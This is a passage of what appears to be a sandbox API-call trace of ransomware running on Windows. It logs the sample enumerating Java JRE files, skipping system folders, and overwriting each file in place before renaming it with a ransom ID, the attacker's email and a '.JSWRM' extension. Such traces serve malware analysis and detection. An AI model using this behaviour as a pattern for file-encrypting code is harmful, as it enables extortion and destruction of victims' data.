ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xd30, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="snmp.acl.template", cAlternateFileName="SNMPAC~1.TEM")) returned 0 [0070.926] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0070.926] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="management-agent.jar", cAlternateFileName="MANAGE~1.JAR")) returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2=".") returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="..") returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="...") returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="windows") returned -1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="recovery") returned -1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="perflogs") returned -1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="documents and settings") returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="system volume information") returned -1 [0070.926] lstrcmpiW (lpString1="management-agent.jar", lpString2="msocache") returned -1 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x241380, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management-agent.jar", lpUsedDefaultChar=0x0) returned 20 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="management-agent.jar", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="management-agent.jar", lpUsedDefaultChar=0x0) returned 20 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0070.926] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.926] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.926] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.927] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.927] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=381) returned 1 [0070.927] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.927] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x170) returned 0x1ff448 [0070.927] ReadFile (in: hFile=0x454, lpBuffer=0x1ff448, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesRead=0x345ec04*=0x170, lpOverlapped=0x0) returned 1 [0070.928] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.928] WriteFile (in: hFile=0x454, lpBuffer=0x1ff448*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x1ff448*, lpNumberOfBytesWritten=0x345ec00*=0x170, lpOverlapped=0x0) returned 1 [0070.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.928] CloseHandle (hObject=0x454) returned 1 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0070.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.928] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.928] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.929] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.929] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management-agent.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management-agent.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.930] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0070.930] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x84e, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="meta-index", cAlternateFileName="META-I~1")) returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2=".") returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="..") returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="...") returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="windows") returned -1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="recovery") returned -1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="perflogs") returned -1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="documents and settings") returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="$RECYCLE.BIN") returned 1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="system volume information") returned -1 [0070.930] lstrcmpiW (lpString1="meta-index", lpString2="msocache") returned -1 [0070.930] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0070.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="meta-index", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="meta-index", lpUsedDefaultChar=0x0) returned 10 [0070.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0070.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0070.931] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.931] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0070.931] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.931] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=2126) returned 1 [0070.931] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.931] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x840) returned 0x23fc98 [0070.931] ReadFile (in: hFile=0x454, lpBuffer=0x23fc98, nNumberOfBytesToRead=0x840, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345ec04*=0x840, lpOverlapped=0x0) returned 1 [0070.933] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.933] WriteFile (in: hFile=0x454, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0x840, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345ec00*=0x840, lpOverlapped=0x0) returned 1 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0070.933] CloseHandle (hObject=0x454) returned 1 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0070.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0070.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216f90 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.933] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216f90 | out: hHeap=0x1e0000) returned 1 [0070.933] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\meta-index.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\meta-index.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0070.934] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1170, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="net.properties", cAlternateFileName="NET~1.PRO")) returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2=".") returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="..") returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="...") returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="windows") returned -1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="recovery") returned -1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="perflogs") returned -1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="documents and settings") returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="$RECYCLE.BIN") returned 1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="system volume information") returned -1 [0070.934] lstrcmpiW (lpString1="net.properties", lpString2="msocache") returned 1 [0070.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.properties", lpUsedDefaultChar=0x0) returned 14 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0070.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="net.properties", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="net.properties", lpUsedDefaultChar=0x0) returned 14 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0070.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0070.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.934] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.935] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.935] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4464) returned 1 [0070.935] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1170) returned 0x24d1d8 [0070.935] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1170, lpOverlapped=0x0) returned 1 [0071.105] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.105] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1170, lpOverlapped=0x0) returned 1 [0071.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0071.105] CloseHandle (hObject=0x454) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0071.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0071.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0071.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0071.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0071.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f280 [0071.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0071.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0071.106] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0071.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f280 | out: hHeap=0x1e0000) returned 1 [0071.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0071.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0071.106] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d81efe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8d81efe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8df45fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1d588b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="plugin.jar", cAlternateFileName="")) returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2=".") returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="..") returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="...") returned 1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="windows") returned -1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="recovery") returned -1 [0071.107] lstrcmpiW (lpString1="plugin.jar", lpString2="perflogs") returned 1 [0071.107] lstrcmpiW 